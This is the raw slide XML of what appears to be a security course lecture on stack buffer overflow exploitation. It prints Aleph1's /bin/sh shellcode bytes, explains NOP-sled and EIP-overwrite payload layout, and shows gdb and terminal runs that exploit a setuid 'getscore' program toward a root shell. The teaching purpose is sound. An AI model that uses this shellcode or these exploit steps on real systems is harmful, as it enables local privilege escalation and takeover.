            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7562800" y="37846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</p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46087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953000" y="5497513"/>
            <a:ext cx="993775" cy="369887"/>
            <a:chOff x="4953000" y="2895600"/>
            <a:chExt cx="993897" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46089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46090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from a function</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48130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48131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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28680" name="AutoShape 11"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="48131" idx="2"/>
            <a:endCxn id="48130" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="1972468" y="3171032"/>
            <a:ext cx="2112963" cy="2247900"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -10819"/>
              <a:gd name="adj2" fmla="val 6610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release control to the caller</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4813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B93207-3F14-DA41-879D-189848CF0811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8145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146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48147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48148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48149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48150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48151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48152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48153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48154" name="Text Box 33"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5116512" y="440325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48155" name="Line 36"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5802312" y="463185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48157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48158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48136" name="Right Arrow 37"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="31242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48137" name="Group 43"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953000" y="5497513"/>
            <a:ext cx="993775" cy="369887"/>
            <a:chOff x="4953000" y="2895600"/>
            <a:chExt cx="993897" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48143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48144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8600" y="4343400"/>
            <a:ext cx="2743200" cy="2514600"/>
            <a:chOff x="381000" y="4343400"/>
            <a:chExt cx="2590801" cy="2133600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48140" name="Cloud Callout 47"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="381000" y="4931979"/>
              <a:ext cx="2302934" cy="1545021"/>
            </a:xfrm>
            <a:prstGeom prst="cloudCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 56093"/>
                <a:gd name="adj2" fmla="val -13694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/>
                <a:t>A buffer overflow on stack can change this control flow</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="48141" name="Straight Connector 49"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="10800000" flipV="1">
              <a:off x="2362200" y="4343400"/>
              <a:ext cx="60960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2" name="Straight Connector 50"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="10800000" flipH="1" flipV="1">
              <a:off x="2362201" y="4343400"/>
              <a:ext cx="60960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829425" y="4495800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overflow attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50178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018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9927FC-FD7F-4340-8F07-FEFAEF149202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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="50181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0187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018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5019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50191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50194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50195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50196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50197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50198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50199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50200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50203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50204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50182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267200" y="2514600"/>
            <a:ext cx="13716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push EBP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allocate a new frame for local variables</a:t>
            </a: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overflow attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52226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222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33807B-8E17-E843-815D-E57C0E260AD5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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="52229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2234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35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52237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top of stack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52241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52242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52243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52244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52245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52250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52251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52230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2231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2232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2233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overflow attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54274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solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>release the function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s frame and restore the saved EBP</a:t>
            </a:r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427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8AC8D8-EB54-264E-B8F0-369567405430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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="54278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4287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428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5428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5429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5116512" y="3966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54297" name="Line 36"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5802312" y="41946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5429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6395200" y="3047546"/>
              <a:ext cx="2973261" cy="7616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smtClean="0"/>
                <a:t>local variables</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54301" name="Text Box 15"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7562800" y="37846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&lt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54279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27" name="Group 41"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="2667000"/>
            <a:ext cx="1450975" cy="598488"/>
            <a:chOff x="4495800" y="2667000"/>
            <a:chExt cx="1451097" cy="597932"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54284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54285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Text Box 35"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4495800" y="2667000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0x41414141</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54281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4282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4283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overflow attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5632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362200" y="54864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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Control Hijacked by Attacker!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5632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758C1C-3275-A64E-BDD2-17BCE1F81CB3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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="56326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6336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6337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.text</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56338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.data</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56339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heap</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56340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&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56341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function argument</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56342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EBP</a:t>
              </a:r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saved EIP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main() local vars</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56345" name="Text Box 33"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5116512" y="440325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ESP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56346" name="Line 36"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5802312" y="463185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argc, **argv, **envp</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56348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altLang="en-US" sz="1800"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56349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local variables</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56327" name="Right Arrow 37"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5600700" y="2971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6829425" y="4495800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&lt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56329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6330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6331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</a:rPr>
              <a:t>A A A A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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4495800" y="2667000"/>
            <a:ext cx="1450975" cy="598488"/>
            <a:chOff x="4495800" y="2667000"/>
            <a:chExt cx="1451097" cy="597932"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56333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EBP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56334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Text Box 35"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4495800" y="2667000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0x41414141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Playing with getscore</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5837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Make a copy of the executable into your own directory, put the long input into the $EGG variable, and run it.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Analyze the core file using gdb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838200" y="23622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[simon@localhost simon]$ ./getscore AAA $EGG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>Segmentation fault (core dumped)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838200" y="3794125"/>
            <a:ext cx="7924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(gdb) target core core.17312</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>Core was generated by `./getscore AAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>Program terminated with signal 11, Segmentation fault.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>#0  0x41414141 in ?? ()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357313" y="5715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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A  A  A  A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124200" y="58674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We can control the program pointer!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5837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67070E-9C57-6E48-B17B-CA7C3D0EBAB5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overflow vulnerability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Program fails to ensure that a write to a buffer is always within its bound.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>When buffer overflow happens, data structures in memory will be corrupted, potentially changing the program’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800"/>
              <a:t>s behavior.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>In many cases it can lead to the execution of arbitrary code by attackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>A common problem for unsafe programming languages such as C and C++.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E6BDDB0-AE2F-324F-9A01-F897B567668E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 and buffer overflow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the implication of a buffer overflow in a setuid program?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the buffer overflow happens when one of the uid fields contains more privilege, it could result in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>local privilege escalation vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,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i.e. an attacker who already obtained local access on the system can escalate his privilege.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If the setuid program is owned by root, an attacker who has user account privilege may gain root privilege on the system.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4CCF6E-6927-5641-9040-00F562DA5940}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1400"/>
              <a:pPr/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buffer overflow exploit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Inject a piece of code into the buffer that will give you a shell on the system (called a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800"/>
              <a:t>), and let EIP point to it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>What will be the privilege of the shell?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>How to write a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Needs to be written in a machine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400"/>
              <a:t>s native language; once executed, gives attacker a shell on the machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Many existing shellcodes for use.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2FBEE2F-876D-F344-94CD-30A7E017C7AC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System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>File system access control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Network access control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Inter-process communication access control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Process scheduling control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Permission for using certain capabilities on smart phones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455-C58A-A34D-9FE2-C765B923E1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 code to use</a:t>
            </a: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/*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>Aleph1's Linux shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>from "Smashing the stack for fun and profit",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>Phrack 49, vol 7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>*/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>char shellcode[] =</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>   "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>   "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>   "\x80\xe8\xdc\xff\xff\xff/bin/sh";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3EC490-2C56-5C49-B3B6-3F3A2614EFEE}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1400"/>
              <a:pPr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malicious input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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1066800" y="25908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4495800" y="2590800"/>
            <a:ext cx="3886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1295400" y="3505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The original buffer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36872" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6629400" y="2590800"/>
            <a:ext cx="11430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EIP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352800" y="2590800"/>
            <a:ext cx="20574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Shell Code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066800" y="2590800"/>
            <a:ext cx="228600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NOP sled</a:t>
            </a:r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2057400" y="1422400"/>
            <a:ext cx="5105400" cy="1168400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 3216"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 736"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 3216"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 736"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 3216"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 736"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 3216"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 736"/>
              <a:gd name="T8" fmla="*/ 0 w 3216"/>
              <a:gd name="T9" fmla="*/ 2147483647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736"/>
              <a:gd name="T17" fmla="*/ 3216 w 3216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736">
                <a:moveTo>
                  <a:pt x="3216" y="736"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="3156" y="600"/>
                  <a:pt x="3096" y="464"/>
                  <a:pt x="2880" y="352"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2664" y="240"/>
                  <a:pt x="2272" y="104"/>
                  <a:pt x="1920" y="64"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1568" y="24"/>
                  <a:pt x="1088" y="0"/>
                  <a:pt x="768" y="112"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="448" y="224"/>
                  <a:pt x="224" y="480"/>
                  <a:pt x="0" y="7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33400" y="444976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Questions: 1.  How long should the input be?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   2. Where should we put the EIP in the input?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                 3. What value of EIP should be put in?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6759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69B2FB-7D3F-114A-BB07-8A19CC7C251D}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1400"/>
              <a:pPr/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72" grpId="0" animBg="1"/>
      <p:bldP spid="29709" grpId="0" animBg="1"/>
      <p:bldP spid="29710" grpId="0" animBg="1"/>
      <p:bldP spid="29711" grpId="0" animBg="1"/>
      <p:bldP spid="297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man  command-name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>hexdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>xxd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VariableName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=`command` </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>echo $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>VariableName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5455-C58A-A34D-9FE2-C765B923E1C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useful gdb commands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Load a core file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> -core </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>core_filename</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Examine registers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>info registers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Examine memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>x/#of words to display</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Help</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>help [command]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64400D-4261-BD40-B797-9D42F6C4C86A}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1400"/>
              <a:pPr/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Hints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r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Size of the buffer:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Must be long enough to contain the shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Must be long enough to override saved EIP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>The order of bytes in memory:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>x/86 is a little-endian architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>What if the distance is not a multiple of four?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Value of EIP:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Impacted by the value of ESP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259E700-858E-ED40-B937-1E689D1B257B}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1400"/>
              <a:pPr/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a root shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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457200" y="182880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/>
              <a:t>[xou@localhost simon]$ ./exploit_gen_with_esp 0xbffff830 160 120</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>Length of shell code: 45</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>Using sp: 0xbffff830</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>Using address: 0xbffff7b8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>NOP sled: 103 bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>[xou@localhost simon]$ cd /root/course_scores/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t>[xou@localhost course_scores]$ ./getscore aaa $EGG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
